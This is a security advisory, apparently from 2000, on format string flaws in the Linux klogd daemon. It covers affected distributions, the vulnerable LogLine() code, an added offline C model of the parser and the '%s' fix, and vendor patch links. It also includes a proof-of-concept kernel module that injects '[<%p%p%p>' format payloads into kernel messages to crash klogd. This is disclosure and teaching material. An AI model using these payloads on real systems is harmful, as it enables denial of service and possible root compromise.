Linux klogd format string vulnerability
Release date: 2000-09-20
Last updated: 2000-09-20
Affected systems:
Conectiva Linux 5.x
Conectiva Linux 4.x
Corel Linux OS 1.0
Debian Linux 2.x
Immunix OS 6.2
MandrakeSoft Linux Mandrake 7.1
MandrakeSoft Linux Mandrake 7.0
MandrakeSoft Linux Mandrake 6.1
MandrakeSoft Linux Mandrake 6.0
RedHat Linux 6.x
RedHat Linux 5.2
S.u.S.E. Linux 7.x
S.u.S.E. Linux 6.x
Slackware Linux 7.1
Slackware Linux 7.0
Slackware Linux 4.0
Trustix Secure Linux 1.x
Turbo Linux 6.0.x
Turbo Linux 4.4
Description:
klogd is the Linux kernel log daemon: it receives messages from the kernel and hands them to syslogd for recording.
klogd contains several format string vulnerabilities that can give a local attacker root privileges; under some conditions root can also be obtained remotely. The root cause is that klogd passes a buffer containing user-influenced data to syslog() as the format string rather than as an argument. The affected code is in the LogLine() function of klogd.c:
LogLine(char *ptr, int len) :
(...)
    if( space == 0 ) /* line buffer is full */
    {
        /*
        ** Line too long. Start a new line.
        */
        *line = 0; /* force null terminator */
        if ( debugging )
        {
            fputs("Line buffer full:\n", stderr);
            fprintf(stderr, "\tLine: %s\n", line);
        }
        Syslog( LOG_INFO, line_buff ); <--- vulnerable call: line_buff is used as the format string
        line = line_buff;
        space = sizeof(line_buff)-1;
        parse_state = PARSING_TEXT;
    }
(...)
    if( *ptr == '\n' ) /* newline */
    {
        *line++ = *ptr++; /* copy it in */
        space -= 1;
        len -= 1;
        *line = 0; /* force null terminator */
        Syslog( LOG_INFO, line_buff ); <--- vulnerable call: line_buff is used as the format string
        line = line_buff;
        space = sizeof(line_buff)-1;
        break;
    }
    if( *ptr == '[' )
(...)
LogLine() does check for '%' characters to avoid exactly this problem, but it skips that check for the text between a '[<' and '>]' pair (the kernel's symbol-address markers). So if a user can make the kernel emit a message containing [<%s %s %s %s>], klogd dereferences bogus pointers, segfaults and dies; with a more carefully crafted format string an attacker can also use the same bug to execute arbitrary code.
To succeed, the attacker needs some path that embeds an attacker-chosen string in a kernel message: a device driver (for example /dev/mixer), a system call (for example connect()), a kernel module, or another application (for example knfsd).
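The following is an added example written for this page, not klogd's own code and not the researchers' test program: a reduced C model of the LogLine() state machine described above. The two-state parser, the buffer size and the function names are assumptions made for illustration; only the behaviour it models (doubling '%' in ordinary text, copying '[<...>]' symbol text verbatim, and the "%s" fix) comes from the advisory. Instead of calling syslog() with the attacker-influenced buffer, it counts how many conversions would survive into the format string, so it runs safely offline.

```c
/*
 * Added example (not klogd's code): reduced model of the LogLine() parser.
 * The two states, LINE_BUFF_SIZE and the helper names are assumptions for
 * illustration; the behaviour modelled is the one the advisory describes.
 */
#include <stdio.h>
#include <string.h>

#define LINE_BUFF_SIZE 1024

enum parse_state { PARSING_TEXT, PARSING_SYMBOL };

/*
 * Copy one kernel message into line_buff the way the vulnerable klogd did.
 * In PARSING_TEXT a '%' is doubled to "%%", which is harmless as a format.
 * Inside a "[<...>]" symbol reference bytes are copied unchanged: this is
 * the missing check.  The copy stops at '\n' or when the buffer is nearly
 * full (the "line buffer is full" branch on the page).  Returns the number
 * of bytes written, excluding the terminator.
 */
size_t klogd_copy_line(const char *msg, char *line_buff, size_t size)
{
    enum parse_state st = PARSING_TEXT;
    size_t out = 0;
    const char *p;

    for (p = msg; *p != '\0' && *p != '\n' && out + 2 < size; p++) {
        if (st == PARSING_TEXT) {
            if (p[0] == '[' && p[1] == '<') {
                st = PARSING_SYMBOL;
                line_buff[out++] = *p;
            } else if (*p == '%') {
                line_buff[out++] = '%';     /* escape: "%" -> "%%" */
                line_buff[out++] = '%';
            } else {
                line_buff[out++] = *p;
            }
        } else {
            line_buff[out++] = *p;          /* symbol text: no escaping */
            if (*p == '>')
                st = PARSING_TEXT;
        }
    }
    line_buff[out] = '\0';
    return out;
}

/*
 * Count the printf conversions line_buff would trigger if passed as the
 * format argument, i.e. Syslog(LOG_INFO, line_buff).  "%%" is a literal
 * percent and is not counted.  Anything above zero means the logger reads
 * (or, via %n, writes) memory chosen by whoever produced the message.
 */
int count_conversions(const char *fmt)
{
    int n = 0;
    const char *p;

    for (p = fmt; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {
            p++;                            /* skip the escaped pair */
            continue;
        }
        n++;
    }
    return n;
}

/* Run a message through the copy step; report how many conversions survive. */
int surviving_conversions(const char *msg)
{
    char line_buff[LINE_BUFF_SIZE];

    klogd_copy_line(msg, line_buff, sizeof line_buff);
    return count_conversions(line_buff);
}

/*
 * The fix: the buffer is an argument, never the format.  In klogd the call
 * becomes Syslog(LOG_INFO, "%s", line_buff); snprintf into dst stands in
 * for Syslog here so the example stays offline.  Returns the length logged.
 */
int log_line_fixed(char *dst, size_t dst_size, const char *line_buff)
{
    return snprintf(dst, dst_size, "%s", line_buff);
}

int main(void)
{
    /* constructed messages: the advisory's symbol-marker payload and an
     * ordinary message that happens to contain a '%' */
    const char *attack = "[<%p%p%p>]\n";
    const char *benign = "disk %s failed\n";
    char line_buff[LINE_BUFF_SIZE], out[LINE_BUFF_SIZE];

    klogd_copy_line(attack, line_buff, sizeof line_buff);
    printf("symbol payload -> \"%s\" (%d conversions if used as format)\n",
           line_buff, count_conversions(line_buff));
    klogd_copy_line(benign, line_buff, sizeof line_buff);
    printf("plain text     -> \"%s\" (%d conversions if used as format)\n",
           line_buff, count_conversions(line_buff));
    log_line_fixed(out, sizeof out, "[<%p%p%p>]");
    printf("fixed sink     -> \"%s\" logged verbatim\n", out);
    return 0;
}
```

Build with gcc -Wall and run. gcc's -Wformat-security warns on the original Syslog( LOG_INFO, line_buff ) call for the same reason count_conversions() reports a non-zero value: the format is not a string literal and no arguments follow it.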
<*Source: Maurycy Prodeus (z33d@eth-security.net)
Jouko Pynnönen (jouko@solutions.fi)
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided solely for security research and teaching. Use at your own risk!
Maurycy Prodeus provided a test program:
-> test.c <-
/* Kernel module for a 2.2-era kernel. printk() turns "%%" into a single '%',
 * so the message klogd receives is "[<%p%p%p>": a format string placed inside
 * the '[<' ... '>]' symbol markers that klogd copies without escaping. */
#define __KERNEL__
#define MODULE
#include <linux/version.h>
#include <sys/syscall.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/types.h>
#include <linux/unistd.h>
#include <linux/fs.h>
#include <linux/sched.h>
#include <asm/segment.h>
#include <asm/desc.h>
int init_module(void)
{
    /* alternative payload: %.2019d expands to 2019 characters */
    // printk("[<%%.2019dAAAA\n");
    printk("[<%%p%%p%%p>\n");
    return 0;
}
void cleanup_module(void)
{
}
<---
# gcc test.c -c -Wall -O2; insmod test; tail /var/log/messages
Recommendation:
Temporary workaround:
NSFOCUS recommends stopping the klogd service until a patch or upgrade has been applied.
Vendor patches:
Many Linux vendors have already published patches/updates:
[ Red Hat Linux 5.2 ]:
sparc:
ftp://updates.redhat.com/5.2/sparc/sysklogd-1.3.31-1.6.sparc.rpm
alpha:
ftp://updates.redhat.com/5.2/alpha/sysklogd-1.3.31-1.6.alpha.rpm
i386:
ftp://updates.redhat.com/5.2/i386/sysklogd-1.3.31-1.6.i386.rpm
sources:
ftp://updates.redhat.com/5.2/SRPMS/sysklogd-1.3.31-1.6.src.rpm
[ Red Hat Linux 6.2 ]:
sparc:
ftp://updates.redhat.com/6.2/sparc/sysklogd-1.3.31-17.sparc.rpm
i386:
ftp://updates.redhat.com/6.2/i386/sysklogd-1.3.31-17.i386.rpm
alpha:
ftp://updates.redhat.com/6.2/alpha/sysklogd-1.3.31-17.alpha.rpm
sources:
ftp://updates.redhat.com/6.2/SRPMS/sysklogd-1.3.31-17.src.rpm
[ Slackware ]
ftp://ftp.slackware.com/pub/slackware/slackware-current/slakware/a1/sysklogd.tgz
[ Debian GNU/Linux 2.1 (alias slink) ]
Source archives:
http://security.debian.org/dists/slink/updates/source/sysklogd_1.3.orig.tar.gz
http://security.debian.org/dists/slink/updates/source/sysklogd_1.3-31.slink1.diff.gz
http://security.debian.org/dists/slink/updates/source/sysklogd_1.3-31.slink1.dsc
Intel:
http://security.debian.org/dists/slink/updates/binary-i386/sysklogd_1.3-31.slink1_i386.deb
[ Debian GNU/Linux 2.2 (alias potato) ]
Source archives:
http://security.debian.org/dists/potato/updates/main/source/sysklogd_1.3-33.1.diff.gz
http://security.debian.org/dists/potato/updates/main/source/sysklogd_1.3-33.1.dsc
http://security.debian.org/dists/potato/updates/main/source/sysklogd_1.3.orig.tar.gz
Alpha:
http://security.debian.org/dists/potato/updates/main/binary-alpha/sysklogd_1.3-33.1_alpha.deb
ARM:
http://security.debian.org/dists/potato/updates/main/binary-arm/sysklogd_1.3-33.1_arm.deb
Intel:
http://security.debian.org/dists/potato/updates/main/binary-i386/sysklogd_1.3-33.1_i386.deb
Sun Sparc:
http://security.debian.org/dists/potato/updates/main/binary-sparc/sysklogd_1.3-33.1_sparc.deb
[ Linux-Mandrake 6.0 ]
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/6.0/RPMS/sysklogd-1.3.31-14mdk.i586.rpm
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/6.0/SRPMS/sysklogd-1.3.31-14mdk.src.rpm
[ Linux-Mandrake 6.1 ]
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/6.1/RPMS/sysklogd-1.3.31-14mdk.i586.rpm
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/6.1/SRPMS/sysklogd-1.3.31-14mdk.src.rpm
[ Linux-Mandrake 7.0 ]
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/7.0/RPMS/sysklogd-1.3.31-15mdk.i586.rpm
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/7.0/SRPMS/sysklogd-1.3.31-15mdk.src.rpm
[ Linux-Mandrake 7.1 ]
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/7.1/RPMS/sysklogd-1.3.31-15mdk.i586.rpm
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/7.1/SRPMS/sysklogd-1.3.31-15mdk.src.rpm
[ Conectiva ]
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/sysklogd-1.4-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/sysklogd-1.4-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/sysklogd-1.4-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/sysklogd-1.4-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/sysklogd-1.4-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/sysklogd-1.4-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/sysklogd-1.4-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/sysklogd-1.4-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/sysklogd-1.4-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/sysklogd-1.4-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/sysklogd-1.4-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/sysklogd-1.4-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/sysklogd-1.4-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/sysklogd-1.4-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/sysklogd-1.4-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/sysklogd-1.4-1cl.i386.rpm
[ Immunix OS 6.2 ]
http://immunix.org:8080/ImmunixOS/6.2/updates/RPMS/sysklogd-1.3.31-17_StackGuard.i386.rpm
http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/sysklogd-1.3.31-17_StackGuard.src.rpm
[ TurboLinux ]
ftp://ftp.turbolinux.com/pub/updates/6.0/sysklogd-1.3.31-6.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/SRPMS/sysklogd-1.3.31-6.src.rpm
[ Trustix ]
ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/sysklogd-1.3.31-18tr.i586.rpm